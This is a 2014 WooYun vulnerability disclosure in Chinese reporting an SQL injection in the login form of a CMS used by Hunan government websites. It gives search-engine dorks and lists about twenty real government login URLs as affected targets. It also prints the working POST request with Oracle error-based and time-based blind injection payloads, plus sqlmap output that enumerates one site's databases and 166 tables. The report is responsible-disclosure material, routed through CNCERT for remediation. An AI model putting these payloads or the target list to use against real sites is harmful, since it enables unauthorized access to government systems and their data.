当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2014-066195

漏洞标题:某政府类CMS通用SQL注入漏洞

相关厂商:Cncert国家互联网应急中心

漏洞作者:

提交时间:2014-06-27 12:14

修复时间:2014-09-25 12:16

公开时间:2014-09-25 12:16

漏洞类型:SQL注射漏洞

危害等级:高

自评Rank:20

漏洞状态:已交由第三方合作机构(cncert国家互联网应急中心)处理

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:

漏洞详情

披露状态:

2014-06-27: 细节已通知厂商并且等待厂商处理中
2014-07-01: 厂商已经确认,细节仅向厂商公开
2014-07-04: 细节向第三方安全合作伙伴开放
2014-08-25: 细节向核心白帽子及相关领域专家公开
2014-09-04: 细节向普通白帽子公开
2014-09-14: 细节向实习白帽子公开
2014-09-25: 细节向公众公开

简要描述:

某政府类内容管理系统

详细说明:

1. 厂商:科创CMS ,官网:www.chinacreator.com
由于有别人提交过了此厂商的任意文件上传,这里摘取其二个关键字,跟提供一个关键字

inurl:comm_front
inurl:comm_front/email
访问科创网站 inurl:login.jsp


2.该内容管理系统多用于湖南省,在登陆处用户名存在注入,默认登录地址为*/login.jsp (案例可从官网客户以及谷歌关键字获取)
3.枚举一些影响案例:

http://www.hngzw.gov.cn/login.jsp 湖南省国资委内容管理系统
http://www.czsx.gov.cn/login.jsp 苏仙区政府门户网站内容管理系统
http://www.zixing.gov.cn/login.jsp 资兴市政府内容管理系统
http://www.czbeihu.gov.cn/login.jsp  北湖内容管理系统
http://www.hn408.org/login.jsp 湖南省残疾人就业信息网内容管理系统
http://yuanjiang.gov.cn/login.jsp 沅江市内容管理系统
http://www.hn12333.com:81/ 湖南人力资源社会保障公共服务网容管理系统
http://www.rc.gov.cn/login.jsp 汝城县人民政府门户网站内容管理系统
http://www.cetz.gov.cn/login.jsp 国家级长沙经济技术开发区网站内容管理系统
http://www.hnbzdj.com/login.jsp 湖南省知识产权局网站内容管理系统
http://www.hnrst.gov.cn/login.jsp 湖南省人力资源和社会保障厅内容管理系统
http://www.lwx.gov.cn:88/login.jsp 临武县人民政府内容管理系统
http://www.bhqrd.gov.cn/login.jsp 中国-北湖区人大网站内容管理系统
http://www.hnrm.gov.cn/login.jsp 湖南无线电管理内容管理系统
http://www.hngy.gov.cn/login.jsp 桂阳县政府门户网站内容管理系统
http://www.hunangtzy.com/login.jsp 湖南省国土资源信息网内容管理系统
http://www.hnipo.gov.cn/login.jsp 湖南省知识产权局内容管理系统
http://www.hnagri.gov.cn/login.jsp 湖南农药厅内容管理系统
http://zwgk.xiangtan.gov.cn/login.jsp 中国湘潭政府门户-政务公开内容管理系统
http://www.hunanpps.com/login.jsp 湖南省农业厅内容管理系统
http://www.hbt.hunan.gov.cn/login.jsp  湖南省环境保护厅内容管理系统


漏洞证明:

登录界面均为如下样式:

c1.jpg


c2.jpg

c3.jpg


c4.jpg


c5.jpg


以汝城县人民政府为例:
http://www.rc.gov.cn/login.jsp
POST:flag=yes&macaddr_=&machineName_=&machineIp_=&userName=admin&password=admin&subsystem_id=cms
userName参数存在注入

---
Place: POST
Parameter: userName
    Type: error-based
    Title: Oracle AND error-based - WHERE or HAVING clause (XMLType)
    Payload: flag=yes&macaddr_=&machineName_=&machineIp_=&userName=admin' AND 45
89=(SELECT UPPER(XMLType(CHR(60)||CHR(58)||CHR(113)||CHR(107)||CHR(108)||CHR(110
)||CHR(113)||(SELECT (CASE WHEN (4589=4589) THEN 1 ELSE 0 END) FROM DUAL)||CHR(1
13)||CHR(110)||CHR(112)||CHR(110)||CHR(113)||CHR(62))) FROM DUAL)-- AMmm&passwor
d=admin&subsystem_id=cms
    Type: AND/OR time-based blind
    Title: Oracle AND time-based blind
    Payload: flag=yes&macaddr_=&machineName_=&machineIp_=&userName=admin' AND 31
09=DBMS_PIPE.RECEIVE_MESSAGE(CHR(99)||CHR(77)||CHR(87)||CHR(116),5)-- FFzU&passw
ord=admin&subsystem_id=cms
---
[15:44:48] [INFO] the back-end DBMS is Oracle
web application technology: JSP
back-end DBMS: Oracle
[15:44:48] [INFO] fetched data logged to text files under 'C:\Python27\sqlmap\ou
tput\www.rc.gov.cn'


available databases [21]:
[*] CTXSYS
[*] DBSNMP
[*] DMSYS
[*] EXFSYS
[*] HR
[*] IX
[*] MDSYS
[*] OE
[*] OLAPSYS
[*] ORDSYS
[*] OUTLN
[*] PM
[*] RUCHENG
[*] SCOTT
[*] SH
[*] SYS
[*] SYSMAN
[*] SYSTEM
[*] TSMSYS
[*] WMSYS
[*] XDB


当前数据库中的表:

Database: RUCHENG
[166 tables]
+--------------------------------+
| AGENT_WORKLOAD                 |
| ASSIGNMENT_AGENT               |
| CMS_GUESTINFO                  |
| CMS_INTERVEW_ANSWER            |
| CMS_INTERVIEW                  |
| CMS_INTERVIEWDETAIL            |
| CMS_INTERVIEWPHOTO             |
| CMS_INTERVIEW_RELATION         |
| CMS_LIVECONTEXT                |
| CMS_LIVEGC                     |
| CMS_LIVEGRAPHICS               |
| CMS_LIVEGRAPHICS2              |
| CMS_VIDEOFILE                  |
| CMS_VIDEOFILE2                 |
| PLAN_TABLE                     |
| TABLEINFO                      |
| TB_CMS_DOC_KIND                |
| TB_CMS_DOC_LEVEL               |
| TB_CMS_DOC_OPER                |
| TB_CMS_DOC_STATUS              |
| TB_CMS_DOC_STATUS_TRANS        |
| TB_CMS_FLOW                    |
| TB_CMS_FLOW_DOC_TRANS          |
| TB_SM_INPUTTYPE                |
| TD_CMS_ADDWATERIMAGE           |
| TD_CMS_CHANNEL                 |
| TD_CMS_CHANNELFIELD            |
| TD_CMS_CHANNEL_VOTE            |
| TD_CMS_CHNL_REF_DOC            |
| TD_CMS_COLLECT_ANSWER          |
| TD_CMS_COLLECT_IPCTRL2         |
| TD_CMS_COLLECT_TIMECTRL2       |
| TD_CMS_COLLECT_TITLE           |
| TD_CMS_CUSTOM_FORM             |
| TD_CMS_DBTSEARCH_DETAIL        |
| TD_CMS_DOCCOMMENT_DICT         |
| TD_CMS_DOCCOM_IMPEACHINFO      |
| TD_CMS_DOCSOURCE               |
| TD_CMS_DOCUMENT                |
| TD_CMS_DOCUMENT_TEMP           |
| TD_CMS_DOC_AGGREGATION         |
| TD_CMS_DOC_ARRANGE             |
| TD_CMS_DOC_ATTACH              |
| TD_CMS_DOC_COMMENT             |
| TD_CMS_DOC_DIST_MANNER         |
| TD_CMS_DOC_PUBLISHING          |
| TD_CMS_DOC_RELATED             |
| TD_CMS_DOC_TASK                |
| TD_CMS_DOC_TASK_DETAIL         |
| TD_CMS_DOC_TEMPLATE            |
| TD_CMS_DOC_VER                 |
| TD_CMS_DOC_VER_ATTACH          |
| TD_CMS_EXTFIELD                |
| TD_CMS_EXTFIELDVALUE           |
| TD_CMS_EXTVALUESCOPE           |
| TD_CMS_FILE_CHANGE_LOG         |
| TD_CMS_FILE_STATUS             |
| TD_CMS_MAILSERVERINFO          |
| TD_CMS_ORDERPUBLISH            |
| TD_CMS_PUBOBJECT_RELATION      |
| TD_CMS_SITE                    |
| TD_CMS_SITEAPPS                |
| TD_CMS_SITEFIELD               |
| TD_CMS_SITEUSER                |
| TD_CMS_SITE_SEARCH             |
| TD_CMS_SITE_TPL                |
| TD_CMS_TEMPLATE                |
| TD_CMS_TEMPLATE_STYLE          |
| TD_CMS_TMPL_EXPORT             |
| TD_CMS_VOTE_ANSWER             |
| TD_CMS_VOTE_IPCTRL             |
| TD_CMS_VOTE_ITEMS              |
| TD_CMS_VOTE_QUESTIONS          |
| TD_CMS_VOTE_TIMECTRL           |
| TD_CMS_VOTE_TITLE              |
| TD_CMS_VOTE_TQ                 |
| TD_COMM_APPLICATION            |
| TD_COMM_APPLICATION_ORGINFO    |
| TD_COMM_APPLICATION_PERSONINFO |
| TD_COMM_APPLICATION_RELATION   |
| TD_COMM_EMAIL                  |
| TD_COMM_EMAILTYPE              |
| TD_COMM_EMAIL_DISPOSEDEP       |
| TD_COMM_LEAVEWORDS             |
| TD_COMM_OVERTURE               |
| TD_COMM_OVERTURE_STATUS        |
| TD_COMM_OVERTURE_TYPE          |
| TD_COMM_PUBLICINFO_CLASS       |
| TD_COMM_TABLE                  |
| TD_COMM_TABLE_TRANSMIT_INFO    |
| TD_COMM_TIME                   |
| TD_COMM_TZZX                   |
| TD_COMM_TZZX_TRANSMIT_INFO     |
| TD_COMM_USERQUERY              |
| TD_COMM_XLHF                   |
| TD_COMM_ZFTS                   |
| TD_COMM_ZFTS_CLASS             |
| TD_COMM_ZFTS_TRANSMIT_INFO     |
| TD_REMINDINFO                  |
| TD_SD_NOTEPAPER                |
| TD_SD_NOTIC                    |
| TD_SD_RATIFYADVICE             |
| TD_SD_REMIND                   |
| TD_SD_SCHEDULAR                |
| TD_SD_SHARE                    |
| TD_SEC_SMS_INTERFACE           |
| TD_SM_DICATTACHFIELD           |
| TD_SM_DICTDATA                 |
| TD_SM_DICTKEYWORDS             |
| TD_SM_DICTTYPE                 |
| TD_SM_GROUP                    |
| TD_SM_GROUPROLE                |
| TD_SM_INITYEAR_HOLIDAY         |
| TD_SM_JOB                      |
| TD_SM_JOBROLE                  |
| TD_SM_LOG                      |
| TD_SM_LOGDETAIL                |
| TD_SM_LOGDETAIL_HIS            |
| TD_SM_LOGMODULE                |
| TD_SM_LOG_HIS                  |
| TD_SM_ORGANIZATION             |
| TD_SM_ORGANIZATION_BASEINFO    |
| TD_SM_ORGANIZATION_LEADER      |
| TD_SM_ORGANIZATION_SECONDE     |
| TD_SM_ORGJOB                   |
| TD_SM_ORGJOBROLE               |
| TD_SM_ORGMANAGER               |
| TD_SM_ORGROLE                  |
| TD_SM_ORGUSER                  |
| TD_SM_PERMISSION_ORIGINE       |
| TD_SM_RES                      |
| TD_SM_ROLE                     |
| TD_SM_ROLERESOP                |
| TD_SM_ROLETYPE                 |
| TD_SM_TAXCODE_ORGANIZATION     |
| TD_SM_USER                     |
| TD_SM_USERGROUP                |
| TD_SM_USERJOBORG               |
| TD_SM_USERJOBORG_HISTORY       |
| TD_SM_USERROLE                 |
| TD_SM_USER_ADDONS              |
| TD_SP_ACCESSORIES              |
| TD_SP_ATTACHMENT               |
| TD_SP_BASEINFO                 |
| TD_SP_BASEINFO_CATALOG         |
| TD_SP_CATALOG                  |
| TD_SP_CONSULTATION             |
| TD_SP_GUIDE                    |
| TD_SP_LAW_RULE                 |
| TD_SP_LAW_RULE_CATALOG         |
| TD_SP_ORGANIZATION             |
| TD_SP_PRINTTEMPLATE            |
| TD_SP_PROJECT                  |
| TD_SP_QUESTION                 |
| TD_SP_QUESTION_CATALOG         |
| TD_SP_TRANSACTONLINE           |
| TD_SP_TRANSACTONLINE_INFO      |
| TD_WEB_TEST_DQ                 |
| TD_WEB_TEST_ITEM               |
| TD_WEB_TEST_LOG                |
| TD_WEB_TEST_QUESTIONS          |
| TL_CMS_DOC_OPER_LOG            |
| TL_CMS_SITE_FLOW_HIS           |
| T_ACCESSLOG_WEBPAGECOUNT       |
| T_ACCESSLOG_WEBSITECOUNT       |
| X_TD_CMS_PUBLISHSCHEDULAR      |
+--------------------------------+


有的虽然有验证码,但是手工注入也是没问题的

修复方案:

联系科创CMS,以及通报所涉及政府网站

版权声明:转载请注明来源 @乌云

漏洞回应

厂商回应:

危害等级:高

漏洞Rank:20

确认时间:2014-07-01 23:12

厂商回复:

CNVD确认并复现所述情况(多个实例认定通用性),根据测试情况,主要涉及湖南一省,已经转由CNCERT下发给湖南分中心,由其后续协调网站管理单位以及软件生产厂商处置。

最新状态:

暂无

漏洞评价:

评论

  1. 2014-06-27 12:22 | ( 普通白帽子 | Rank:1207 漏洞数:104 | 传闻中魇是一个惊世奇男子,但是除了他华...)

    @xsser @疯狗 这个厂商别人提交的是前台,怎么到我这就小厂商了?

  2. 2014-06-27 16:08 | U神 ( 核心白帽子 | Rank:1285 漏洞数:142 | 感谢乌云,知恩不忘,其实我一直都在乌云默...)

    @魇 因为你刷rank刷的太多了

  3. 2014-06-27 16:09 | ( 普通白帽子 | Rank:1207 漏洞数:104 | 传闻中魇是一个惊世奇男子,但是除了他华...)

    @U神 快上Q

  4. 2014-09-25 16:18 | 卡农的保镖 ( 路人 | Rank:4 漏洞数:3 | 好)

    洞主如此邪恶